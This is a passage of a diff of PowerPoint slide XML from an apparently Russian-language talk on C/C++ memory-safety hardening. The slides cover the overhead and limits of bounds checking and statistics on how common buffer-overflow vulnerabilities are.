+            <a:normAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Накладные расходы</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>:</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>0.3% в серверных приложениях Google</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="2"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId2"/>
+              </a:rPr>
+              <a:t>Retrofitting spatial safety to hundreds of millions of lines of C++</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="2"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0">
+                <a:hlinkClick r:id="rId3"/>
+              </a:rPr>
+              <a:t>Только при условии включённых ThinLTO и PGO</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>, иначе </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId4"/>
+              </a:rPr>
+              <a:t>1-2%</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>3.5% при компиляции </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>CGBuiltin.cpp </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>компилятором Clang</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>F</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>alse negatives:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Покрывает только подмножество ошибок (некорректные индексы, только STL)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Некоторые ошибки обнаруживать слишком дорого (например ошибки в итераторах)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4092177488"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide41.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Title 1">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                 <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88930F68-01D6-4DFC-8C4B-096056195DAD}"/>
               </a:ext>
             </a:extLst>
@@ -13448,7 +13698,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide41.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide42.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -13532,7 +13782,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide42.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide43.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -14080,7 +14330,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide43.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide44.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -14718,7 +14968,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide44.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide45.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -14971,7 +15221,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide45.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide46.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -15097,7 +15347,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide46.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide47.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -15362,7 +15612,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide47.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide48.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -15449,7 +15699,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide48.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide49.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -15628,7 +15878,308 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide49.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide5.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Title 1">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{077C58F6-C4AB-4F64-B829-BC366562077D}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Распространённость </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>buffer overflow </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>уязвимостей</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="Content Placeholder 2">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BDFD9631-53E8-4D6D-A000-E7F004BC0133}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr>
+            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>11% CVE </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>и 6.5% </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>KEV </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>в 2024</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>20% из них это </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>stack overflow (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>наиболее опасная уязвимость)</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Не лучшая метрика (большая часть </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>CVE </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>это уязвимости веб-приложений)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Лидирующие позиции в рейтинге наиболее опасных уязвимостей</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:hlinkClick r:id="rId2"/>
+              </a:rPr>
+              <a:t>Mitre</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId2"/>
+              </a:rPr>
+              <a:t> CWE Top 25 2024</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>места 2, 6, 8, 20</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>)</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>70% уязвимостей в продуктах </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Microsoft </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>вызваны ошибками работы с памятью</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId3"/>
+              </a:rPr>
+              <a:t>MSRC Blog: A proactive approach to more secure code</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>70% high/critical </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>багов в проекте </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Chromium – </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>ошибки</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>памяти</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId4"/>
+              </a:rPr>
+              <a:t>Chromium Security: Memory Safety</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>40% атак, вызванных ошибками работы с памятью</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>вызваны </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>buffer overflow</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId5"/>
+              </a:rPr>
+              <a:t>Google Project Zero</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="5" name="Picture 4">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B53CDCD-FB7A-4AC6-9448-79BD075801FF}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId6">
+            <a:extLst>
+              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+              </a:ext>
+            </a:extLst>
+          </a:blip>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="8924645" y="1123688"/>
+            <a:ext cx="3088061" cy="900374"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+      </p:pic>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4193036608"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide50.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -16458,308 +17009,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide5.xml><?xml version="1.0" encoding="utf-8"?>
-<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
-  <p:cSld>
-    <p:spTree>
-      <p:nvGrpSpPr>
-        <p:cNvPr id="1" name=""/>
-        <p:cNvGrpSpPr/>
-        <p:nvPr/>
-      </p:nvGrpSpPr>
-      <p:grpSpPr>
-        <a:xfrm>
-          <a:off x="0" y="0"/>
-          <a:ext cx="0" cy="0"/>
-          <a:chOff x="0" y="0"/>
-          <a:chExt cx="0" cy="0"/>
-        </a:xfrm>
-      </p:grpSpPr>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="2" name="Title 1">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{077C58F6-C4AB-4F64-B829-BC366562077D}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="title"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr/>
-        <p:txBody>
-          <a:bodyPr/>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Распространённость </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>buffer overflow </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>уязвимостей</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="3" name="Content Placeholder 2">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BDFD9631-53E8-4D6D-A000-E7F004BC0133}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph idx="1"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr/>
-        <p:txBody>
-          <a:bodyPr>
-            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>11% CVE </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>и 6.5% </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>KEV </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>в 2024</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>20% из них это </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>stack overflow (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>наиболее опасная уязвимость)</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Не лучшая метрика (большая часть </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>CVE </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>это уязвимости веб-приложений)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Лидирующие позиции в рейтинге наиболее опасных уязвимостей</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:hlinkClick r:id="rId2"/>
-              </a:rPr>
-              <a:t>Mitre</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId2"/>
-              </a:rPr>
-              <a:t> CWE Top 25 2024</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>места 2, 6, 8, 20</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>)</a:t>
-            </a:r>
-            <a:endParaRPr lang="ru-RU" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>70% уязвимостей в продуктах </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Microsoft </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>вызваны ошибками работы с памятью</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId3"/>
-              </a:rPr>
-              <a:t>MSRC Blog: A proactive approach to more secure code</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>70% high/critical </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>багов в проекте </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Chromium – </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>ошибки</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>памяти</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId4"/>
-              </a:rPr>
-              <a:t>Chromium Security: Memory Safety</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>40% атак, вызванных ошибками работы с памятью</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>, </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>вызваны </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>buffer overflow</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId5"/>
-              </a:rPr>
-              <a:t>Google Project Zero</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:pic>
-        <p:nvPicPr>
-          <p:cNvPr id="5" name="Picture 4">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B53CDCD-FB7A-4AC6-9448-79BD075801FF}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvPicPr>
-            <a:picLocks noChangeAspect="1"/>
-          </p:cNvPicPr>
-          <p:nvPr/>
-        </p:nvPicPr>
-        <p:blipFill>
-          <a:blip r:embed="rId6">
-            <a:extLst>
-              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
-                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
-              </a:ext>
-            </a:extLst>
-          </a:blip>
-          <a:stretch>
-            <a:fillRect/>
-          </a:stretch>
-        </p:blipFill>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="8924645" y="1123688"/>
-            <a:ext cx="3088061" cy="900374"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-      </p:pic>
-    </p:spTree>
-    <p:extLst>
-      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4193036608"/>
-      </p:ext>
-    </p:extLst>
-  </p:cSld>
-  <p:clrMapOvr>
-    <a:masterClrMapping/>
-  </p:clrMapOvr>
-</p:sld>
-</file>
-
-<file path=ppt/slides/slide50.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide51.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -16889,7 +17139,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide51.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide52.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -16953,7 +17203,9 @@
         </p:nvSpPr>
         <p:spPr/>
         <p:txBody>
-          <a:bodyPr/>
+          <a:bodyPr>
+            <a:normAutofit lnSpcReduction="10000"/>
+          </a:bodyPr>
           <a:lstStyle/>
           <a:p>
             <a:r>
@@ -16999,10 +17251,9 @@
               <a:t>с </a:t>
             </a:r>
             <a:r>
-              <a:rPr lang="en-US"/>
+              <a:rPr lang="en-US" dirty="0"/>
               <a:t>-DBUILD_SHARED_LIBS</a:t>
             </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
           <a:p>
             <a:r>
@@ -17030,7 +17281,22 @@
               <a:rPr lang="ru-RU" dirty="0"/>
               <a:t>Не защищает пользовательские таблицы функций</a:t>
             </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>и библиотечные, например </a:t>
